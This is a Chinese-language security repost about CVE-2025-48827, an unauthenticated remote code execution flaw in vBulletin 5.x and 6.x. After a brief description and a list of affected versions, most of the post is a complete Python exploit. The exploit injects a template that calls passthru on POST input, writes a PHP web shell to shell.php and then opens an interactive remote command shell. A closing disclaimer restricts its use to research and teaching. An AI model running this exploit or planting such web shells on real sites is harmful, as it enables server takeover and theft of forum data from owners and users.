0x00 前言
vBulletin是一个强大,灵活并可完全根据自己的需要定制的商业论坛程序(非开源),它使用PHP脚本语言编写,并且基于以高效和高速著称的数据库引擎MySQL。
0x01 漏洞描述
调用受保护的API控制器replaceAdTemplat执行未授权的操作,从而执行任意代码。
0x02 CVE编号
CVE-2025-48827
0x03 影响版本
5.0.0 <= vBulletin < 5.7.6
6.0.0 <= vBulletin < 6.0.4
0x04 漏洞详情
POC:
https://github.com/0xgh057r3c0n/CVE-2025-48827
#!/usr/bin/env python3
import requests
import sys
import urllib3
import re
# Suppress InsecureRequestWarning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI Colors
RED = "�33[31m"
GREEN = "�33[32m"
YELLOW = "�33[33m"
BLUE = "�33[34m"
CYAN = "�33[36m"
BOLD = "�33[1m"
RESET = "�33[0m"
def banner():
print(CYAN + BOLD + r"""
__________ .__ .__ __ .__ ___________________ _______>
___ _______ __ __| | | | _____/ |_|__| __________ _ ___ \_ __>
/ /| | _/ | | | | _/ __ __ |/ | _/ / | _>
/ | | | / |_| |_ ___/| | | | | | ____| >
_/ |______ /____/|____/____/___ >__| |__|___| /____|_ /______ /______>
/ / / / / >
vBulletin RCE - Web Shell Dropper by 0xgh057r3c0n
""" + RESET)
def usage(script):
print(YELLOW + f"nUsage: python3 {script} <URL>")
print(f"Example: python3 {script} http://target/vb/n" + RESET)
sys.exit(1)
def error_exit(msg):
print(RED + f"[-] Error: {msg}n" + RESET)
sys.exit(1)
def info(msg):
print(YELLOW + f"[!] {msg}" + RESET)
def success(msg):
print(GREEN + f"[+] {msg}" + RESET)
def inject_rce_template(session, target):
inject_data = {
"routestring": "ajax/api/ad/replaceAdTemplate",
"styleid": "1",
"location": "rce",
"template": '<vb:if condition='"passthru"($_POST["cmd"])'> </vb:if>'
}
r = session.post(target, data=inject_data, verify=False)
if r.text.strip() != "null":
error_exit("Template injection failed.")
success("RCE payload injected.")
def drop_shell(session, target):
shell_code = '<?php if(isset($_GET["cmd"])){echo "<pre>"; system($_GET["cmd"]); echo "</pre>";} ?>'
cmd = f"echo {shell_code!r} > shell.php"
drop_data = {
"routestring": "ajax/render/ad_rce",
"styleid": "1",
"location": "rce",
"cmd": cmd
}
session.post(target, data=drop_data, verify=False)
success(f"shell.php dropped at: {target}shell.php")
info("Launch commands like:")
print(f" curl '{target}shell.php?cmd=whoami'n")
def run_command(session, target, cmd):
data = {
"routestring": "ajax/render/ad_rce",
"styleid": "1",
"location": "rce",
"cmd": cmd
}
r = session.post(target, data=data, verify=False)
if r.status_code != 200:
print(RED + f"[-] HTTP error: {r.status_code}" + RESET)
return None
# Always show full response for debug
print(YELLOW + "[DEBUG] Full response:n" + RESET + r.text)
match = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)
if match:
return match.group(1).strip()
else:
return None
def interactive_shell(session, target):
cwd = "."
info("Entering interactive mode (type 'exit' to quit)")
while True:
try:
user_input = input(f"{BOLD}{BLUE}(shell:{cwd})$ {RESET}").strip()
except (KeyboardInterrupt, EOFError):
print("n" + YELLOW + "[!] Exiting interactive shell." + RESET)
break
if user_input.lower() == "exit":
break
if user_input.startswith("cd "):
path = user_input[3:].strip()
cmd = f"cd {cwd} && cd {path} && pwd"
output = run_command(session, target, cmd)
if output:
cwd = output
else:
print(RED + "[-] Directory change failed." + RESET)
continue
cmd = f"cd {cwd} && {user_input}"
output = run_command(session, target, cmd)
if output:
print(GREEN + output + RESET)
else:
print(RED + "[-] No output or command failed." + RESET)
def main():
banner()
if len(sys.argv) != 2:
usage(sys.argv[0])
target = sys.argv[1].rstrip('/') + '/'
session = requests.Session()
try:
inject_rce_template(session, target)
drop_shell(session, target)
interactive_shell(session, target)
except requests.exceptions.RequestException as e:
error_exit(f"Request error: {e}")
if __name__ == "__main__":
main()
0x05 参考链接
https://kevintel.com/CVE-2025-48827
https://github.com/0xgh057r3c0n/CVE-2025-48827
原文始发于微信公众号(信安百科):CVE-2025-48827|vBulletin远程代码执行漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论